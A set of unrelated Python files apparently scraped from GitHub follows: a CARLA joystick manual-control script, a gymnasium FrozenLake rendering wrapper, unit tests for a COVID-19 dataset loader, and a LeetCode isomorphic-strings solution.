self.reset_flag = False
# tps counter
self.tps_total_time = 0
self.tps_total_frame = 0
def __del__(self):
pygame.quit()
def reset_env(self):
self.obs = self.env.reset()
self.rew = None
self.done = False
self.total_reward = None
def get_action(self):
# init joysticks
if self.joysticks is None:
self.joysticks = [Joystick(fn) for fn in Joystick.list_devices()]
# pump events before get
pygame.event.pump()
# get joysticks
act = []
for js in self.joysticks:
accel = -js.axes["ry"] # Left lever, L <--> R
steer = js.axes["x"] # Right lever, U <--> D
reverse = js.buttons["tl"] # LB
# act.append(carla.VehicleControl(
# throttle=max(0.0, accel),
# brake=-min(0.0, accel),
#
# steer=steer,
# reverse=reverse
# ))
act.append(np.array([accel, steer], dtype=np.float32))
# check if reset
is_reset = sum([js.buttons["y"] for js in self.joysticks])
is_reset |= self.done
if is_reset:
if not self.reset_flag:
self.reset_env()
self.reset_flag = True
else:
self.reset_flag = False
return act
def on_event(self, event):
if event.type == pygame.QUIT:
self.running = False
return
def on_update(self):
# update env
act = self.get_action()
start_time = time.time()
self.obs, self.rew, self.done, _, = self.env.step(act)
elapsed = time.time() - start_time
# update total reward
if self.total_reward is None:
self.total_reward = np.array(self.rew)
else:
self.total_reward += np.array(self.rew)
# tps counter
self.tps_total_time += elapsed
self.tps_total_frame += 1
if self.tps_total_frame >= 100:
print("TPS: {}".format(self.tps_total_frame / self.tps_total_time))
self.tps_total_frame = 0
self.tps_total_time = 0
def on_render(self):
_, h, w = self.obs[0][0].shape
# init surface
if self.surface is None:
n_cars = len(self.obs)
n_cameras = len(self.obs[0])
self.surface = pygame.display.set_mode((w * n_cameras, h * n_cars), pygame.HWSURFACE | pygame.DOUBLEBUF)
# show images
y = 0
for cam, rew in zip(self.obs, self.total_reward):
# draw car cam images
x = 0
for cam_img in cam:
if cam_img.shape[0] < 3:
# pad channel
padded_cam_img = np.concatenate([
cam_img,
np.zeros((1, *cam_img.shape[1:]), dtype=cam_img.dtype)], axis=0)
else:
padded_cam_img = cam_img
cam_surf = pygame.surfarray.make_surface(padded_cam_img.transpose(2, 1, 0))
self.surface.blit(cam_surf, (x, y))
x += w
# draw reward
rew_surf = self.font.render("Reward: {:.2f}".format(rew), True, (0, 0, 255))
self.surface.blit(rew_surf, (10, y + 10))
y += h
# update display
pygame.display.update()
def run(self, fps: int = None):
clock = pygame.time.Clock()
while self.running:
for event in pygame.event.get():
self.on_event(event)
self.on_update()
self.on_render()
if fps:
clock.tick(fps)
def main():
dt = 0.1
global_options = {
"world": {
"dt": dt
}
}
env = CarlaEnv(global_options, 0)
ui = ManualInterface(env)
ui.run(int(1.0 / dt))
if __name__ == '__main__':
main()
| imoneoi/carla_env | scripts/manual_control.py | manual_control.py | py | 4,642 | python | en | code | 3 | github-code | 36 |
8785489698 | import gymnasium as gym
from IPython import display
import matplotlib.pyplot as plt
from utils.visualize import visualize_policy, visualize_q, visualize_model, visualize_v
class JupyterRender(gym.Wrapper):
def __init__(self, env):
super().__init__(env)
self.env = env
def render(self, title='Environment', v=None, q=None, policy=None, model_r=None, model_ns=None):
viz_list = {}
if v is not None:
viz_list['v'] = v
if q is not None:
viz_list['q'] = q
if policy is not None:
viz_list['policy'] = policy
if model_r is not None:
viz_list['model_r'] = model_r
if model_ns is not None:
viz_list['model_ns'] = model_ns
fig = plt.figure(figsize=(8, 8))
ax_list = [fig.add_subplot(2, 2, 1)]
img = ax_list[0].imshow(self.env.render()) # prepare to render the environment by using matplotlib and ipython display
ax_list[0].set_title(title)
pos = 2
for i in range(pos, 2 + len(viz_list)):
ax_list.append(fig.add_subplot(2, 2, i))
ax_index = 1
for key, value in viz_list.items():
if key == 'policy':
visualize_policy(value, ax_list[ax_index], self.env.nrow, self.env.ncol)
elif key == 'v':
visualize_v(value, ax_list[ax_index], self.env.nrow, self.env.ncol)
elif key == 'q':
visualize_q(value, ax_list[ax_index], self.env.nrow, self.env.ncol)
else:
if key == 'model_r':
title = 'Reward Model'
elif key == 'model_ns':
title = 'Next State Model'
visualize_model(value, ax_list[ax_index], self.env.nrow, self.env.ncol, title)
ax_index += 1
for ax in ax_list:
ax.tick_params(bottom=False, left=False, labelbottom=False, labelleft=False)
display.display(plt.gcf())
display.clear_output(wait=True)
plt.close()
if __name__ == '__main__':
env = gym.make("FrozenLake-v1", render_mode='rgb_array', is_slippery=False) # define the environment.
env = JupyterRender(env)
| moripiri/Reinforcement-Learning-on-FrozenLake | utils/wrapper.py | wrapper.py | py | 2,250 | python | en | code | 4 | github-code | 36 |
34092269946 | # To be filled by students
import unittest
import pandas as pd
import sys
import os
from pandas._libs.missing import NA
from pandas.util.testing import assert_frame_equal
if os.path.abspath(".") not in sys.path: sys.path.append(os.path.abspath("."))
from src.data import Dataset
class TestDataset(unittest.TestCase):
def setUp(self):
self.data=pd.read_csv('https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_daily_reports_us/01-01-2021.csv')
def tearDown(self):
del self.data
def test_get_name(self):
df1=pd.DataFrame(self.data)
data=Dataset(name='01-01-2021.csv',df=df1)
expected='01-01-2021.csv'
result=data.get_name()
self.assertEqual(result,expected)
def test_get_n_rows(self):
df1=pd.DataFrame(self.data)
data=Dataset(name='01-01-2021.csv',df=df1)
expected=58
result=data.get_n_rows()
self.assertEqual(result,expected)
def test_get_n_cols(self):
df1=pd.DataFrame(self.data)
data=Dataset(name='01-01-2021.csv',df=df1)
expected=18
result=data.get_n_cols()
self.assertEqual(result,expected)
if __name__ == '__main__':
unittest.main()
| amy-panda/EDAWebApp | src/test/test_data.py | test_data.py | py | 1,309 | python | en | code | 0 | github-code | 36 |
26579543800 | '''
Given two strings s and t, determine if they are isomorphic.
Two strings are isomorphic if the characters in s can be replaced to get t.
All occurrences of a character must be replaced with another character while preserving the order of characters. No two characters may map to the same character but a character may map to itself.
For example,
Given "egg", "add", return true.
Given "foo", "bar", return false.
Given "paper", "title", return true.
Note:
You may assume both s and t have the same length
'''
class Solution(object):
def isIsomorphic(self, s, t):
if not s and not t:
return True
if not s:
return False
return self.__isoHelper(s, t) and self.__isoHelper(t, s)
def __isoHelper(self, s, t):
mappings = {}
for c1, c2 in zip(s, t):
if c2 in mappings and mappings[c2] != c1:
return False
mappings[c2] = c1
return True
if __name__ == "__main__":
assert True == Solution().isIsomorphic("foo","add")
assert False == Solution().isIsomorphic("aa", "ab")
assert True == Solution().isIsomorphic("ab", "ba") | msencer/leetcode-solutions | easy/python/Isomorphic.py | Isomorphic.py | py | 1,159 | python | en | code | 5 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.